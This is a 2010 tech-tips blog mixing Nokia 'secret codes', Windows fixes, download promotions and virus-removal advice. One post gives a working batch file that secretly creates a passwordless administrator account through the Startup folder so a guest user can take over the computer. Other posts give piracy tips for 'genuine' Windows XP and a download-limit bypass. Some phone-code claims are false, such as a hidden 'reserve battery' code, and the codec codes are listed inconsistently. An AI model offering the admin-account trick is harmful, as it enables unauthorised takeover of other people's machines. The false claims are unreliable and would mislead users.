Sunday 30 May 2010

Mobile Hacks: Secret codes for Nokia handset users (on readers request)

1) Imagine that the battery charge of your handset is very low, your are expecting an important call and you don't have a charger. You will be needing this tip in such a situation.
Nokia handsets comes with a reserve battery. 
To activate, key is "*3370#". Your cell will restart with this reserve and your mobile will show a 50% increase in battery. This reserve will get charged when you charge your mobile next time.

*3370# Activate Enhanced Full Rate Codec (EFR)- Your phone uses the best sound quality but talk time is reduced by approx. 5%

#3370# Deactivate Enhanced Full Rate Codec( EFR)

*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#4720# Deactivate Half Rate Codec

2) *#0000# Displays your phones software version,

1st Line : Software Version,
2nd Line : Software Release Date,
3rd Line : Compression Type

3) *#9999# Phones software v ersion if *#0000# does not work

4) *#06# For checking the International Mobile Equipment Identity (IMEI Number)

5) #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

6) #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

7) #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

8) #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)

9) *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodafone)

10) *#21# Allows you to check the number that "All Calls" are diverted To

11) *#2640# Displays security code in use

12) *#30# Lets you see the private number

13) *#43# Allows you to check the "Call Waiting" status of your phone.

14) *#61# Allows you to check the number that "On No Reply" calls are diverted to

15) *#62# Allows you to check the number that "Divert If Unreachable(no service)" calls are diverted to

16) *#67# Allows you to check the number that "On Busy Calls"  are diverted to

17) *#67705646#Removes operator logo on 3310 & 3330

18) *#73# Reset phone timers and game scores

19) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible

20) *#7760# Manufactures code

21) *#7780# Restorefa ctory settings

22) *#8110# Software version for the nokia 8110

23) *#92702689# (to rember *#WAR0ANTY#) Displays -

1.Serial Number,
2.Date Made
3.Purchase Date,
4.Date of last repair (0000 for no. of repairs),
5.Transfer User Data.

To exit this mode you need to  switch your phone off and then switch on again.

24) *#94870345123456789# Deactivate the PWM-Mem

25) **21*number# Turn on "All Calls" diverting to the phone number entered

26) **61*number# Turn on "No Reply" diverting to the phone  number entered

27) **67*number# Turn on "On Busy" diverting to the phone number entered

28) 12345 This is the default security code press and hold # 

Wednesday 26 May 2010


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Tuesday 25 May 2010

How To Fix WMP.dll Error Message?

An error message similar to the one given below may be displayed on your computer screen when you try to open Windows Media Player on your computer:The file wmp.dll has a version number of where was expected. Windows Media Player is not installed properly and must be reinstalled.You may not be able to fix the error even by reinstalling the Media Player and the error message may display when you try to launch the application soon after re-installation.
To resolve this issue, open Start menu, select Run, type the following error message, and then press Enter.

C:\windows\inf\unregmp2.exe /UpdateWMP

Performing this task may fix the confusion regarding Media Player version numbers and resolve the error message.At times, an error message similar to the one given below may appear on your computer screen when you try to play a video file on your Media Player:Explorer has caused a problem in wmp.dll.

To resolve this issue,

Using Guest Account To Create Admin Account

Step 1:- Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)

@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

Step 2:- Copy the file to the Startup folder. Here is the path to the Startup folder:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup

The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.

Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created

Monday 17 May 2010

Windows Explorer.exe Does Not Load\Run

This type of problem occurs when your computer get infected from the virus or spyware which has corrupted some registry keys which are related to explorer load.

Here is how you can fix this issue:


Follow the procedure below

1. Press Ctrl+Shift+Esc to launch task manager

2. Click File | New Task

3. Now type regedit and click Ok

4. Browse the following registry path

Windows NTCurrentVersionImage File Execution.options

5. Under this registry path, you will see subkeys named explorer.exe and iexplorer.exe.
These keys must be pointing to files created by the virus that have been removed (virus/spyware); explorer32dbg.exe and iexplore_dbg.exe.

6. Delete the explorer and iexplorer keys entirely.

7. Close Registry and restart your computer

We hope this procedure given above will help you fix the problem, if it does not let us know through comments.

Hack the RAPIDSHARE no wait to download

Downloading from RAPIDSHARE often becomes a headache due to the time delay for FREE downloaders!!!
Do as follows :
>> Click a Download link for Rapidshare !

>> Click the Free button on Rapidshare Page !

>> Now as usual the timer starts !!!
>> Now, go to the address box of your browser. (Address Box
>> Where you type the websites !)
Erase the link written in it
>> In the address box type: javascript:alert(c=1)
>> Click OK on the alert box that arises. >> NO WAITING.........ENJOY...

How To Solve "There Are No Active Mixer Devices Available" Error Message in Windows?

Solution 1:

Go to Start > Run and type in: services.msc , and hit enter.Scroll down to "Windows Audio", right-click on it and select Properties, set the startup type to Automatic, click Apply and then click the Start button.

Solution 2:
Computer was giving the error “no active mixer devices available” whenever they clicked on the volume icon in their task bar. This problem came up out of nowhere and it was almost of if the computer never had sound before! In the Sound and Audio Devices applet in Control Panel, everything was grayed out and there was a message saying “No audio device” under the Volume tab

Upon checking under the Hardware

GMAIL Does Not Recognise Dots(..)

Hi friends...
Its quite surprising and interesting.we have been using gmail since years.But you may not notice this feature.It doesn't "recognize dots in username."
At gmail log in page you can enter any number of dots in ignores it as such.
For example if your usenrname is then,if you enter
or any number of dots , with same password it log ins succesfully.Try it Once:)

Internet Explorer Asks To Press F1 Key ? DON’T PRESS IT

Microsoft has been reported of a vulnerability discovered in Windows operating systems Windows XP, Windows 2000 and Windows Server 2003 which exploits the VB Script. Microsoft has recently released an Advisory named “Microsoft Security Advisory (981169)”

As per the advisory there is a vulnerability that if a user presses F1 Key on being asked by a Website or webpage, the website can run potentially malicious code or scrip on such computers. That computer can get hacked, information can be stolen or it may also lead to data theft.

It is an advice to all our readers and Windows XP, Windows 2002 and Windows 2003 Server users to beware of this vulnerability and do not press the F1 Key when asked by a website. This may leave your computer unsecured or infected with virus or trojans.

Even if you are a Windows Vista User or Windows 7 or Windows Server 2008 user, its a safety tip to not click F1 Key when asked by a website.

How To Find Windows XP Key Inside CD (Manually)?

Hi friends...
Are you worried to remember your XP key.Its no more, here is a solution for it :).Your cd key is preserved in the cd itself.

Steps to follow to find Windows XP CD key:

1. Bring your Windows XP CD and insert it into your computer’s CD/DVD ROM/ RAM.

2. Now, browse your Windows XP CD and find the folder I386.

3. Inside I386 folder, find the file named as unattended.txt.

4. Open unattended.txt by using notepad.

5. At last, keep scrolling of the opened file and you will get Windows XP CD key.

Ultra Portable Photoshop CS5 - 127 MB

Windows | Eng | 127 MB


Use USB Pen Drive or External Memory on Hard disk for Speed Up Computer without Additional RAM Memory

If you are looking for increase the computer performance probably you’ll need to buy an additional RAM. Anyway still you want to make quite faster your computer without buying any additional resources and using only exiting materials then this is something similar for your needs.eboostr is a Software which facilitate to use extra memory space on the hard drive or your Pen drive to improve computer respond time and performances.

About Eboostr

Eboostr is quite similar to vista ReadyBoost and SuperFetch technology which use flash memory to speedup computer overall performance.Eboostr gathers statistics about applications you use and how often and optimizing their performance by pre-caching their files and data on different cache devices and allowing faster access speed and reduced delays.

How to use eBooster:

First you have to Download eboostr Trial version will never expire, although it works only four hours after every start of your pc. If you need continuously use it then you have to restart your computer again and again and it'll allow 4 hour for using it after every restart.

Install eboostr and open, eboostr Control Panel

Click Add button.

Select the memory device which has good enough memory it can be your pen drive or hard drive

Change the cache size. Normally it is enough to set your cache size for 4GB more than 16GB no sense

Click ok at this time it will ask you for building cache in selected device and allocated memory space, click ok.After it builds the cache, you're ready for using it. Finally don't forget to measure your speed by eBoostr SpeedMeasure Tool.

Drop your idea about purchasing RAM anymore to increase perforamnce of your PC.Your Pendrice will do the part.!!

Make XP Genuine

download jellybean keyfinder from this website

Now open keyfinder.exe
Click on options and click "change windows key"
Now enter this key and you're done.

P.S: this works on windows xp pro and home sp2 only......

Any video Converter

 This freeware it convert video files to diffrent Audio&video Formates And it is Use as Video cutter

                                      Click to Download



                  YOU ARE DONE

How to Download & Save Google Book as PDF? Google Book Downloader for Free

Google Book Search a unique place to search and read your favorite books before actually purchasing or to take reference from that book for your documents.Google Book search letsyou to download non copy writeand public domain books and documents in PDF format. But you can’t download copy write Books fromGoogle Book Search. A several restrictions are enforced for preventing downloading of copy write books, at max you can read some pages from that book. Here is small utility Google Book Downloader 0.1.0 for downloading and saving of books as PDF format from Google Book search.

Google Book Downloader 0.1.0 can only download books which are marked as to full view. If you try to download copy write book then it not download all pages of book.
Download Google Book Downloader 0.1.0 Alpha 2.

Renaming The Start Button:

To rename the start button, you will need a hex editor.

My preference is UltraEdit
Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
With the hex editor, open that file and go to offset 412b6
You will see the word start with blanks between each letter
Edit it be any 5 characters or less
Save the file
Boot to DOS
Copy the existing c:\windows\explorer.exe to
Copy explorer_1.exe to explorer.exe
You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.
Note: If the partition is NTFS and you can't access the files from DOS:
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
Change the value of Shell from Explorer.exe to explorer_1.exe


Some users have gotten an error message similar to the following when attempting either to shutdown or restart Win XP:


TechNet and the Microsoft Knowledge Base have numerous articles discussing this type of error condition; for example, these. As a review of these articles will show, these are commonly device driver problems, but may also be caused by troublesome software (such as the notorious CrashGuard), or a problem in a system service. MSKB article Q262575 discusses a shutdown problem of this type, known to exist in Windows 2000 due to a resource (IRQ) conflict, if you have PACE Interlok anti-piracy software installed. This problem may occur in Windows XP as well.
Microsoft advises the following as one approach to these problems: Restart the computer. Press F8 during the restart and select “Last Known Good Configuration.” If you catch the problem when it first occurs (meaning you likely have installed only one or two drivers or new service), this will return you to a previous working condition. (Would System Restore accomplish the same thing? I don’t know, and don’t have a broken system to test it on.)

Microsoft reported similarly that these STOP code error message occur when Windows XP is trying to shut down devices. He says that he has seen this twice: once with Logitech Quickcam installed (with an unsupported driver), and once with a USB DSL modem that would hang if it wasn’t disconnected before shutdown.

How do remove an extra operating system

If you have more then one operating system installed and if you wish to remove an operating system from the boot menu, you can use the following information.

step 1: Click on Start, Control Panel, System, Advanced.
step 2: Under Startup and Recovery, click Settings.
step 3: Under Default Operating System, choose one of the following:"Microsoft Windows Professional/fastdetect"-or-"Microsoft Windows XP Home/fasdetect"-or-"Microsoft Windows2000 Professional /fastdetect"
step 4: Take the checkmark out of the box for "Time to display a list of Operating Systems".
step 5: Click Apply and Ok, and reboot the system.
NOTE: If you wish to edit the boot.ini file manually, click on the button "EDIT"

How To Select, Copy & Paste Text In Command Prompt

If you are a fairly advanced computer user you must be using DOS command prompt now and then to get things done, in this post you will see how to get copy and paste functionality in the DOS box.

  1. Launch Command prompt by pressing WINDOWS + R key.
  2. Type in cmd and press ENTER
  3. Right Click anywhere in window (see image below)
  4. Select Mark or Edit > Mark (If used the title bar control menu)
  5. Highlight desired text.
  6. Press ENTER to copy text to clipboard.

Copy Text From DOS Window
Text Selection From DOS

Same method can be used to paste text into the DOS window, just select the Paste option from the right-click menu.

Movie Compressor v8.0 – Compress 4.7GB Movies to 100MB
Movie Compressor v8.0 – Compress 4.7GB Movies to 100MB!
Movie compressor 8.0 is the best software to compress the a 4.7 GB movie or video file to 100 MB. You can convert any type of file such as AVI,MPEG, WMV. You lose very minimal video quality after compression.

Secret Mobile Codes for Nokia Handsets

Type the Below codes on the Main Screen of Your Mobile:

*#06# - for checking the IMEI (International Mobile Equipment Identity).
*#7780# - Reset to factory settings.
*#67705646# - This will clear the LCD display (operator logo).
*#0000# - To view software version.
*#2820# - Blue tooth device address.
*#746025625# - Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# - Shows if sim have restrictions.
*#92702689# - Takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phones, use this code for reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code.Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin#
*#7328748263373738# resets security code.Default security code is 12345
How to Format Nokia mobile:Do a Full phone formatting on your Nokia 6600 and Nokia 7610! as steps below,
1. Make sure you have at least 3/4 charge of battery power left.
2. Backup your contacts list and personal files to MMC memory card.
3. Switch-off your Mobile phone.
4. Press and hold 3 keys-- Green dial key,- * Star key(asterisk),- no. 3 key on keypad and then press the power on/off to swtich on the 6600 phone.
Remember, do not let go the 3 press and hold keys until you see a "formatting" word screen show!
5. After a few minutes when the Full phone formatting completed, your 6600 will back to original system and factory settings.

How To Format Memory Card Of A Mobile Phone

There may be some occasions where we need to format a memory card because of virus problem or slower speed of the mobile phone or any other problem. So here I amproviding with you the step by step process to format the memory card of a mobile phone. To format a memory card you need a Memory card reader as shown below.Note: Take backup of your important data such as contacts, messages, downloaded ring tones, wallpapers, snaps taken by you etc. before formatting the memory card becoz all data will be lost after formatting the memory cardThere are varieties of memory card readers are available in the market. Take a better one for you. Here are the steps to do so.step 1: Insert the memory card into memory card reader which is to be formatted.(There are many type of memory cards available in the market such as SD/MMC , Mini, Micro, SM/XD, MS/MSPRO, CF/MD etc) So insert the memory card in the appropriate slot of the card reader. If you don't have a Micro slot in the memory card reader then you need a adapter for it and then you can insert into MMC slot.
step 2: Plug your memory card reader in any of the USB (universal serial bus) port of your computer. It might be on the front of the PC or may be at the back of the PC.

step 3: Then open My Computer

step 4: Right click the drive that belongs to card reader and choose FORMAT from the menu. (A window appears on the screen)
step 5: and then choose the desired file system type from file system drop down menu.

step 6: type in the volume label for your memory card in the volume label text box and then press Start button to start formatting of the memory card.
step 7: A warning message will be appeared on the screen showing that all the data in the memory card will be erased. Press Ok button to start formatting process.

step 8: A message will be appeared on the screen "Format complete". Means your memory card is successfully formatted.

Note: If other than this message is appeared on the screen such as "Memory card is write protected" then

>> Check the lock of the memory card adopter if you are using a adopter.
>> Check whether memory card is inserted into card reader properly
>> Check whether memory card is inserted into the adopter properly or not if you are using adopter for micro.

Free CD of UBUNTU linux get it

This is a free ubuntul linux free destibution
First you must register with your Gmail (or) any email address.
They send the link to your mail account.
Click that link AND enter your home address 
They send 3cds max
The send cds in 15days max
Instal those cds in your system inside WINDOWS (or)
totally LINUX


5 Free Alternatives For MS Office

Most of them uses Microsoft Products only but if you think of any new alternatives then here is your end for your search!

Best alternate Desktop applications for MS Office
1. Open Office

2. Lotus Symphony

Best alternate online applications for MS Office

1. Zoho Office

2. Google Docs

3. Thinkfree

Open docx files in Firefox without Office 07

A good news for all those who do not wish to download a converter for converting .docx, .xlsx, .pptx etc. files to .doc, .xls, .ppt respectively. There's a new Firefox extension from Microsoft that will help view all .*x extension files to be displayed as normal html pages in FireFox.Called OpenXML viewer, this plug-in (download link) lets you read docx files inside the Firefox browser just like any other HTML web page while retaining all the text formatting and layout.

There’s a command-line version of OpenXML viewer (download link) available as well for converting docx documents into HTML files that you may then open in any other web browser.

Windows 7 Transformation Pack for Windows XP and Vista

 It’s time to migrate to windows 7 operating system. But Windows 7 needs high configuration at least windows vista configuration is needed to run normalWindows 7 operating system.

This installer is designed to work on the following operating systems and languages:
Windows Vista (all editions, SP1)
Windows 2008 (all editions, SP1)
All Language Versions
64-bit versions of Windows are NOT supported
Download Windows 7 transformation pack

Windows 7 User Guide from Microsoft

Microsoft released Windows 7 IT Pro Guides which explains about Windows 7 and their features.
Windows 7 IT Pro Guide consists whats new feature in Windows 7 which includes information about DirectAccess, BranchCache and other networking technologies, VHD boot and other deployment technologies, and AppLocker, Biometrics, and other security technologies.
Windows 7 IT Pro Guide includes Windows 7 Manageability Overview Guide, covering the manageability improvements that can reduce total cost of ownership by helping to increase automation, improve user productivity, and provide flexible administrative control to meet compliance technologies.
Download Windows 7 IT Pro Guide in (.doc) format

How to Shutdown Your PC with Timer

Do you know that you can make your PC shutdown at a time u wish to? If no then no worries,Here is an end to that!

Step 1: 
Right click on your desktop and choose “New=>shortcuts“.
Step 2:
In the box that says “Type the location of the shortcut“,type in “shutdown -s -t 3600” without the quotation marks and click next.
Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.
Step 3:
Make up a name for the shortcut and you’re done.You can change the icon by right clicking=>properities=>change icon=>browse.
To abort the tazk:
To make an abort key to stop the shutdown timer just create another shortcut and makethe “location of the shortcut” to “ shutdown -a” without the quotes.
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this instart=>Run
Type Code: at 11:35 shutdown -s
To abortCode: shutdown -a
Note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type“at 20:30 shutdown -s” without quote

Make Your System Boot Time Faster

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs.

We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:
step 1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
step 2. From the Start menu, select "Run..." & type "gpedit.msc".
step 3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
step 4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
step 5. Click "OK", "Apply" & "OK" once again to exit.

Resolve Error While Removing Pen Drive : Generic volume cannot be stopped right now error

When you try to remove a USB pen-drive by using “Safely Remove Hardware > Safely remove USB Mass Storage device” option, windows should stop all the read-write operations on the drive so that the drive can be removed.

But sometimes when you try to eject the USB device by using “Safely remove USB Mass Storage device” option, it shows a message box which says:The Device Generic volume cannot be stopped right now. Try stopping the device later”In such case its not safe to remove the pen drive as it can get corrupt or get damaged. Many of us face such problem in removing pen-drive. In this post we will see how to fix such issue.
First Let’s see why it happens and the fix for that.This error comes when you have an application which is running from your pen drive or may be some file or document opened from your pen-drive when you are removing your drive.In short, some file on your pen drive is in use by some other program on that computer. So close all such files or applications and try removing the drive.It happens sometimes that you have no application running from your pen drive or any file opened in your knowledge but still when you try to remove the pen-drive it shows this error message shown above. In that case you can use a free application called Unlocker which will help you to remove your pen drive from your windows.
What is Unlocker? Unlocker is an explorer extension that allows you with a simple right-click of the mouse on a file, folder or pen drive to get rid of error message like the one mentioned above.
How To Remove USB Pen Drive with Unlocker?
step 1: Download Unlocker from here and install it on your computer.
step 2: Right click on your USB pen drive in my computer and select Unlocker.
step 3: A new window will open that will list all the busy handles of files being used on your pen drive. Now click the button which says Unlock AllAfter clicking Unlock All try to remove your pen drive normally, through “Safely Remove Hardware” dialog.
If still you are not able to remove pen drive then try clicking the Kill Process button in Unlocker.

Restart Windows without Restarting PC

It’s really very very annoying to restart your PC everytime after you install some hefty applications. Ever thought how to get rid of this? Well most of us will never think of this and just stick to the default Windows Xp/Vista’s annoying reboot process.

Here is a trick involving tricking the Pc do a “warm reboot,” rather than a “cold boot.” The trick involves holding down the SHIFT key when invoking the restart.
Windows Vista: Select Start, then click on the padlock button icon and from there, hold down the SHIFT key while clicking on the “Restart” choice.
Windows XP: Its pretty much the same. Select Start. Select “Shut Down…” Hold down the SHIFT key while clicking on the “Restart” button.

Sunday 16 May 2010

What is NEWFOLDER.EXE?? and how to remove?

NEWFLODER.EXE it works is
This virus affects your system by :
  • Disabling Task Manager
  • Disabling Registry Editor
  • Creates a startup entry to start upon system start and
  • Creates its own exe files in Shared Documents folder which appear like ordinary folders.
  • Disables Folder Options
  • Uses your 50% or more processor
You can see that the folders in Shared Documents have an exe extension If you have unchecked Hide extensions for known file types in Folder Options.
Virus Removal Tool Description 2.5 (Also Removes Nhatquanglan Variant of NewFolder.exe)
Sets these entries in Registry
[sourcecode language='cpp'][HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]“NofolderOptions”=[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]“@”=[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]“YahooMessengger”=[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon]“Shell”=”Explorer.exe”[/sourcecode]
Deletes Virus Files
  • svichossst.exe
  • autorun.inf
  • at1.job
  • autorun.ini
  • (Nhatquanglan) scvhosts.exe
  • blastclnnn.exe
  • hinhem.scr
  • All duplicated exe files in Shared Documents Folder
  • Also the exe files in your selected folder
2:Not understand above that?
Download Winpatrol and instal and run it.It shows all prosses of Windows 
Click the Active tasks and select the NEWFLODER.EXE 
Finally click the KILL TASK button
 Download the winpetrol from this link

:::---::: Click to Download :::---:::


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